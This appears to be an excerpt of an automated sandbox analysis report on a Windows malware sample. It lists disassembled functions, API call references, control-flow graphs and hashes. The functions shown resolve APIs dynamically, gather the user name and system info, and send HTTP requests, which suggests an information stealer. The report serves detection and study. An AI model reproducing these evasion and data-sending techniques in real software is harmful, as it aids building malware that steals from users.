                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                            • API String ID: 2127927946-2218711628
                                            • Opcode ID: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                                            • Instruction ID: 5e1cd967cc1bd71f365b3ff5871be6e8d111942329c8327febd6a33c3aeace51
                                            • Opcode Fuzzy Hash: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                                            • Instruction Fuzzy Hash: 5841BD79740624EBC718AFE5EC8DB987F70AB4C712BA0C062F90296190C7F9D5019B3D

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 752 419860-419874 call 419750 755 419a93-419af2 LoadLibraryA * 5 752->755 756 41987a-419a8e call 419780 GetProcAddress * 21 752->756 758 419af4-419b08 GetProcAddress 755->758 759 419b0d-419b14 755->759 756->755 758->759 761 419b46-419b4d 759->761 762 419b16-419b41 GetProcAddress * 2 759->762 763 419b68-419b6f 761->763 764 419b4f-419b63 GetProcAddress 761->764 762->761 765 419b71-419b84 GetProcAddress 763->765 766 419b89-419b90 763->766 764->763 765->766 767 419bc1-419bc2 766->767 768 419b92-419bbc GetProcAddress * 2 766->768 768->767
                                            APIs
                                            • GetProcAddress.KERNEL32(75900000,0079DCE0), ref: 004198A1
                                            • GetProcAddress.KERNEL32(75900000,0079D078), ref: 004198BA
                                            • GetProcAddress.KERNEL32(75900000,0079CF70), ref: 004198D2
                                            • GetProcAddress.KERNEL32(75900000,0079D198), ref: 004198EA
                                            • GetProcAddress.KERNEL32(75900000,0079D138), ref: 00419903
                                            • GetProcAddress.KERNEL32(75900000,00797258), ref: 0041991B
                                            • GetProcAddress.KERNEL32(75900000,00795798), ref: 00419933
                                            • GetProcAddress.KERNEL32(75900000,007959B8), ref: 0041994C
                                            • GetProcAddress.KERNEL32(75900000,0079D1E0), ref: 00419964
                                            • GetProcAddress.KERNEL32(75900000,0079CFE8), ref: 0041997C
                                            • GetProcAddress.KERNEL32(75900000,0079CF88), ref: 00419995
                                            • GetProcAddress.KERNEL32(75900000,0079CFA0), ref: 004199AD
                                            • GetProcAddress.KERNEL32(75900000,00795758), ref: 004199C5
                                            • GetProcAddress.KERNEL32(75900000,0079D000), ref: 004199DE
                                            • GetProcAddress.KERNEL32(75900000,0079D228), ref: 004199F6
                                            • GetProcAddress.KERNEL32(75900000,007957B8), ref: 00419A0E
                                            • GetProcAddress.KERNEL32(75900000,0079D0C0), ref: 00419A27
                                            • GetProcAddress.KERNEL32(75900000,0079D1F8), ref: 00419A3F
                                            • GetProcAddress.KERNEL32(75900000,00795838), ref: 00419A57
                                            • GetProcAddress.KERNEL32(75900000,0079D210), ref: 00419A70
                                            • GetProcAddress.KERNEL32(75900000,007957D8), ref: 00419A88
                                            • LoadLibraryA.KERNEL32(0079D018,?,00416A00), ref: 00419A9A
                                            • LoadLibraryA.KERNEL32(0079D168,?,00416A00), ref: 00419AAB
                                            • LoadLibraryA.KERNEL32(0079D240,?,00416A00), ref: 00419ABD
                                            • LoadLibraryA.KERNEL32(0079D048,?,00416A00), ref: 00419ACF
                                            • LoadLibraryA.KERNEL32(0079D090,?,00416A00), ref: 00419AE0
                                            • GetProcAddress.KERNEL32(75070000,0079D150), ref: 00419B02
                                            • GetProcAddress.KERNEL32(75FD0000,0079D180), ref: 00419B23
                                            • GetProcAddress.KERNEL32(75FD0000,0079D1B0), ref: 00419B3B
                                            • GetProcAddress.KERNEL32(75A50000,0079D030), ref: 00419B5D
                                            • GetProcAddress.KERNEL32(74E50000,007956F8), ref: 00419B7E
                                            • GetProcAddress.KERNEL32(76E80000,007971E8), ref: 00419B9F
                                            • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00419BB6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad
                                            • String ID: 8Xy$NtQueryInformationProcess$XWy$Xry$qy
                                            • API String ID: 2238633743-3607508908
                                            • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                            • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                            • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                            • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 769 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 784 404944 769->784 785 40494b-40494f 769->785 784->785 786 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 785->786 787 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 785->787 786->787 873 404ad3-404ad7 786->873 797 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 787->797 798 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 787->798 798->797 874 404ae5 873->874 875 404ad9-404ae3 873->875 876 404aef-404b22 HttpOpenRequestA 874->876 875->876 877 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 876->877 878 404ebe-404ec5 InternetCloseHandle 876->878 989 404e32-404e5c InternetReadFile 877->989 878->787 990 404e67-404eb9 InternetCloseHandle call 41a800 989->990 991 404e5e-404e65 989->991 990->878 991->990 992 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 991->992 992->989
                                            APIs
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                              • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                              • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                            • StrCmpCA.SHLWAPI(?,007CC908), ref: 0040493A
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                            • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,007CC858), ref: 00404DE8
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                            • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                            • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                            • HttpOpenRequestA.WININET(00000000,007CC9D8,?,007CC638,00000000,00000000,00400100,00000000), ref: 00404B15
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                            • String ID: "$"$------$------$------
                                            • API String ID: 2402878923-2180234286
                                            • Opcode ID: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                            • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                            • Opcode Fuzzy Hash: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                            • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocNameProcessUser
                                            • String ID:
                                            • API String ID: 1206570057-0
                                            • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                            • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                            • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                            • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                            APIs
                                            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                            • ExitProcess.KERNEL32 ref: 0040117E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitInfoProcessSystem
                                            • String ID:
                                            • API String ID: 752954902-0
                                            • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                            • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                            • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                            • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                                            APIs
                                            • GetProcAddress.KERNEL32(75900000,00795818), ref: 00419C2D
                                            • GetProcAddress.KERNEL32(75900000,00795858), ref: 00419C45
                                            • GetProcAddress.KERNEL32(75900000,0079D258), ref: 00419C5E
                                            • GetProcAddress.KERNEL32(75900000,0079D270), ref: 00419C76
                                            • GetProcAddress.KERNEL32(75900000,0079D288), ref: 00419C8E
                                            • GetProcAddress.KERNEL32(75900000,0079D300), ref: 00419CA7
                                            • GetProcAddress.KERNEL32(75900000,0079A898), ref: 00419CBF
                                            • GetProcAddress.KERNEL32(75900000,0079D2B8), ref: 00419CD7
                                            • GetProcAddress.KERNEL32(75900000,0079D2D0), ref: 00419CF0
                                            • GetProcAddress.KERNEL32(75900000,0079D2E8), ref: 00419D08
                                            • GetProcAddress.KERNEL32(75900000,007CA818), ref: 00419D20
                                            • GetProcAddress.KERNEL32(75900000,00795878), ref: 00419D39
                                            • GetProcAddress.KERNEL32(75900000,00795918), ref: 00419D51
                                            • GetProcAddress.KERNEL32(75900000,007958B8), ref: 00419D69
                                            • GetProcAddress.KERNEL32(75900000,007958D8), ref: 00419D82
                                            • GetProcAddress.KERNEL32(75900000,007CA7E8), ref: 00419D9A
                                            • GetProcAddress.KERNEL32(75900000,007CA878), ref: 00419DB2
                                            • GetProcAddress.KERNEL32(75900000,0079A4D8), ref: 00419DCB
                                            • GetProcAddress.KERNEL32(75900000,00795938), ref: 00419DE3
                                            • GetProcAddress.KERNEL32(75900000,007CA7D0), ref: 00419DFB
                                            • GetProcAddress.KERNEL32(75900000,007CA728), ref: 00419E14
                                            • GetProcAddress.KERNEL32(75900000,007CA830), ref: 00419E2C
                                            • GetProcAddress.KERNEL32(75900000,007CA758), ref: 00419E44
                                            • GetProcAddress.KERNEL32(75900000,00795A58), ref: 00419E5D
                                            • GetProcAddress.KERNEL32(75900000,007CA710), ref: 00419E75
                                            • GetProcAddress.KERNEL32(75900000,007CA698), ref: 00419E8D
                                            • GetProcAddress.KERNEL32(75900000,007CA680), ref: 00419EA6
                                            • GetProcAddress.KERNEL32(75900000,007CA7B8), ref: 00419EBE
                                            • GetProcAddress.KERNEL32(75900000,007CA8F0), ref: 00419ED6
                                            • GetProcAddress.KERNEL32(75900000,007CA740), ref: 00419EEF
                                            • GetProcAddress.KERNEL32(75900000,007CA770), ref: 00419F07
                                            • GetProcAddress.KERNEL32(75900000,007CA788), ref: 00419F1F
                                            • GetProcAddress.KERNEL32(75900000,007CA950), ref: 00419F38
                                            • GetProcAddress.KERNEL32(75900000,00799C48), ref: 00419F50
                                            • GetProcAddress.KERNEL32(75900000,007CA860), ref: 00419F68
                                            • GetProcAddress.KERNEL32(75900000,007CA6B0), ref: 00419F81
                                            • GetProcAddress.KERNEL32(75900000,00795958), ref: 00419F99
                                            • GetProcAddress.KERNEL32(75900000,007CA7A0), ref: 00419FB1
                                            • GetProcAddress.KERNEL32(75900000,00795A38), ref: 00419FCA
                                            • GetProcAddress.KERNEL32(75900000,007CA908), ref: 00419FE2
                                            • GetProcAddress.KERNEL32(75900000,007CA800), ref: 00419FFA
                                            • GetProcAddress.KERNEL32(75900000,00795A78), ref: 0041A013
                                            • GetProcAddress.KERNEL32(75900000,00795338), ref: 0041A02B
                                            • LoadLibraryA.KERNEL32(007CA6C8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                            • LoadLibraryA.KERNEL32(007CA848,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                            • LoadLibraryA.KERNEL32(007CA920,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                            • LoadLibraryA.KERNEL32(007CA890,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                            • LoadLibraryA.KERNEL32(007CA938,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                            • LoadLibraryA.KERNEL32(007CA6E0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                            • LoadLibraryA.KERNEL32(007CA668,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                            • LoadLibraryA.KERNEL32(007CA8A8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                            • GetProcAddress.KERNEL32(75FD0000,007954B8), ref: 0041A0DA
                                            • GetProcAddress.KERNEL32(75FD0000,007CA6F8), ref: 0041A0F2
                                            • GetProcAddress.KERNEL32(75FD0000,0079D390), ref: 0041A10A
                                            • GetProcAddress.KERNEL32(75FD0000,007CA8C0), ref: 0041A123
                                            • GetProcAddress.KERNEL32(75FD0000,00795478), ref: 0041A13B
                                            • GetProcAddress.KERNEL32(734B0000,0079A9B0), ref: 0041A160
                                            • GetProcAddress.KERNEL32(734B0000,00795578), ref: 0041A179
                                            • GetProcAddress.KERNEL32(734B0000,0079A668), ref: 0041A191
                                            • GetProcAddress.KERNEL32(734B0000,007CA8D8), ref: 0041A1A9
                                            • GetProcAddress.KERNEL32(734B0000,007CAA10), ref: 0041A1C2
                                            • GetProcAddress.KERNEL32(734B0000,00795318), ref: 0041A1DA
                                            • GetProcAddress.KERNEL32(734B0000,00795698), ref: 0041A1F2
                                            • GetProcAddress.KERNEL32(734B0000,007CA9E0), ref: 0041A20B
                                            • GetProcAddress.KERNEL32(763B0000,00795458), ref: 0041A22C
